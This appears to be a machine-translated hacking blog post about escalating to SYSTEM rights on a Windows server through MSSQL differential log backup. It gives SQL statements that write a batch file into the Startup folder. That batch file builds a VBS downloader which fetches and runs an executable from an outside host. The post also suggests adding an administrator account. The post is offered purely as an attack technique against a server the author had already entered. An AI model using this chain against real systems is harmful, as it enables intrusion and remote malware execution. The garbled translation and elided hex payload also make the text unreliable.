Download MSSQL differential backup software with system Permissions
Download MSSQL differential backup software with system Permissions
I had no intention of entering a website when I was searching for information on the internet yesterday. I entered the website in a confused manner. I couldn't raise my right. Then I added the Q Number of the service provider to ask a Social Engineer, after shooting for half a day, I learned that the security of the server was the security provided by the Green Alliance. Then I asked the pig if there was any way to raise the right. He just sent this animation to me, I found the article on the Internet and copied it together. recently I have been busy studying and seldom pay attention to this aspect. I am falling behind and falling behind ......
Below are the materials and animations found online.
The internal information in the TEAM has been put on the shelf for a long time. If you don't release it now, someone will discover it sooner or later! In this case, share it with everyone!
MSSQL differential backup is almost confusing to obtain webshell, so we can use the files backed up by difference as malicious code.
After the system is executed, will the system automatically escalate permissions or add administrators? Of course the answer is okay. After kj021320 has been tested for N times, I will tell you!
So we have to consider the location of the file ~ Where will the system run? This is actually nonsense!
You don't need to know where C: \ Documents ents and Settings \ All Users \ "start" Menu \ Program \ Start
The location is ready! So what files can we back up for the system to execute?
This is the first key point ~!
Exe js vbs bat files were first thought.
If I analyze the exe one by one! Absolutely! However, MSSQL differential backup will definitely break the exe so much garbage!
Reject
Then go to the script
Can we comment out the spam information of VBS? Otherwise, the VBS will fail to run! Anyone who has learned VBS knows that
There are two annotations in VBS, I .e., rem.
However, there will still be junk information that cannot be blocked.
Reject
What about JS? JS contains multi-line comments/**/but/* cannot be in the first line?
Reject
Finally, the most familiar bat is left!
OK. Let's continue to analyze what the comment in bat is? It's also REM, failed! Previously, vbs won't work. The rem comments here won't work either!
So what should we do? It's actually very easy! What happens when we make a wrong command system under CMD?
Speaking of this, if you do not read the following articles, you can think of a solution ~
OK. Let's continue exploring ~~ Here is the most important point. We can use the carriage return to submit the garbage information backed up by different backups!
The system only processes them as useless commands! Our operations are not affected!
Is the problem solved in this way? No !~ During MSSQL backup, junk characters will appear at a certain length, which will affect our operations!
So we need to reduce the number of statements as much as possible. The fewer the statements, the better ~
Okay, so we can use bat to write a VBS downloader, execute the downloader, and finally obtain the system permission through the trojan of the downloader down.
The following is the BAT of the generated downloader I modified.
Echo Set P = createObject ("Microsoft. XMLHTTP")> k. vbs
Echo P. Open "GET", "http://www.isto.cn/t.exe", 0> k. vbs
Echo P. Send (): set G = createObject ("ADODB. Stream")> k. vbs
Echo G. Mode = 3: G. Type = 1: G. Open ()> k. vbs
Echo G. Write P. ResponseBody: G. SaveToFile "t.exe", 2> k. vbs
K. vbs
T
After the next k.vbscontext, k.vbsdownloads A t.exe file and saves it locally for direct execution.
Remember to use carriage return to submit junk data before the code I mentioned. It is best to use two or more carriage return headers.
Then implement differential backup
Alter database ISTO set recovery full --
Create table cmd (a image )--
Backup log ISTO to disk = 'C: \ cmd1 'with init --
Insert into cmd (a) values (values
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
6B2E7662730D0A740D0A )--
Backup log ISTO to disk = 'C: \ Documents ents and Settings \ All Users \ Start Menu \ Program \ Start \ 1. bat '--
Drop table cmd --
OK, bat is out! How can I restart the server! Let's leave this question for you to discuss!
If 3389 is enabled on the server, it is more convenient! Directly bat a command to add an administrator is better!
Isto is a tool used in animation.